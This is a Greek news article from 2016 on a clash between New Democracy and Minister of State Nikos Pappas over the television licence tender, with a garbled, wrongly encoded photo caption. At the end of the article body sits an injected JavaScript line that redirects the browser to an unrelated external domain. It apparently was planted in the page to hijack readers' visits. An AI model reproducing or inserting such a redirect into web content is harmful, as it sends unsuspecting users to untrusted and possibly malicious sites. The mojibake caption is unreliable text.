Νέα κόντρα ΝΔ – Παππά για τις τηλεοπτικές άδειες

0
5
ÓõíÜíôçóç ôùí áñìïäßùí êõâåñíçôéêþí óôåëå÷þí ìå ôïõò åêðñïóþðïõò ôùí ôåóóÜñùí ðñïóùñéíþí õðåñèåìáôéóôþí óôç ÃåíéêÞ Ãñáììáôåßá ÅíçìÝñùóçò êáé Åðéêïéíùíßáò, ôçí ÄåõôÝñá 5 Óåðôåìâñßïõ 2016. (EUROKINISSI/ÃÉÙÑÃÏÓ ÊÏÍÔÁÑÉÍÇÓ)

 

Με…φόντο τις τηλεοπτικές άδειες ξέσπασε η νέα κόντρα μεταξύ της ΝΔ και του υπουργού Επικρατείας, Νίκου Παππά για τις τηλεοπτικές άδεις.

Για προσπάθεια εξαπάτησης του ελληνικού λαού από τον Αλέξη Τσίπρα κάνει λόγο η ΝΔ, αναφερόμενη στη δήλωση του πρωθυπουργού ότι «όποιος από τους «προσωρινούς υπερθεματιστές» δεν πληροί τις προϋποθέσεις, δεν θα πάρει άδεια». «Η ΝΔ αδυνατεί να βγάλει την περούκα της διαπλοκής» αντααπαντά ο Νίκος Παππάς.

Ειδικότερα, σε ανακοίνωσή του, το γραφείο Τύπου της ΝΔ τονίζει πως «οι πολίτες έχουν πλέον απαξιώσει τον διαγωνισμό – παρωδία που έστησε η κυβέρνηση για τις τηλεοπτικές άδειες» και υπενθυμίζει στον πρωθυπουργό, για τον οποίο λέει ότι δεν τον ενημερώνουν ο κ. Παππάς και η κ. Γεροβασίλη, ότι ο γενικός γραμματέας Ενημέρωσης, που ενέκρινε το υπ’ αριθ. 24/9.9.2016 πρακτικό της Πενταμελούς Ειδικής Επιτροπής Διενέργειας Διαγωνισμού, ανακήρυξε ως οριστικούς υπερθεματιστές τους τέσσερις πλειοδότες.

«Επομένως, αναμένουμε ο κ. Τσίπρας να αποδεχθεί το αίτημά μας και να έρθουν στην Επιτροπή Θεσμών και Διαφάνειας της Βουλής ο κ. Παππάς, οι πλειοδότες, καθώς και όσοι έχουν άμεση εμπλοκή στη διαγωνιστική διαδικασία, που εξελίσσεται σε φιάσκο» καταλήγει η ΝΔ.

«Είναι προφανές ότι η ΝΔ αδυνατεί να βγάλει την περούκα της διαπλοκής» τονίζει σε δήλωση του από τη Νέα Υόρκη, ο υπουργός Επικρατείας Νίκος Παππάς, απαντώντας στο κόμμα της αξιωματικής αντιπολίτευσης.
Όπως, σημειώνει η ΝΔ «είναι γνήσιος εκφραστής του χρεοκοπημένου παρελθόντος. Τότε, που τα ΜΜΕ δανείζονταν με αέρα και τα κόμματα έπαιρναν δημόσιο χρήμα μέσω Siemens».

Ο κ. Παππάς αναφέρει ότι «ο διαγωνισμός έγινε, τα κριτήρια ήταν αυστηρά, ο οικονομικός έλεγχος γίνεται με το γράμμα του νόμου, οι υποψήφιοι -όπως δικαιούνται- κάνουν ενστάσεις ο ένας για τον άλλο. Ο καθένας ασκεί τα δικαιώματα του» για να επισημάνει ότι «τα χρήματα καταβάλλονται τις επόμενες μέρες».

«Αυτά τα χρήματα υπόσχεται η ΝΔ να τα δώσει πίσω στους καναλάρχες» αναφέρει ο υπουργός Επικρατείας και τονίζει: «Είναι ντροπή. Ντροπή μεγαλύτερη ακόμα και από τα 27 χρόνια απραξίας και διαπλοκής».

«Τους ενημερώνουμε» υπογραμμίζει ο Νίκος Παππάς, «πως δεν περνάνε οι θρασύδειλες απειλές εναντίον των μελών της Επιτροπής. Ο διαγωνισμός έχει πραγματοποιηθεί. Όσο και αν η ΝΔ φωνάζει, η Ελλάδα προχωρά». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here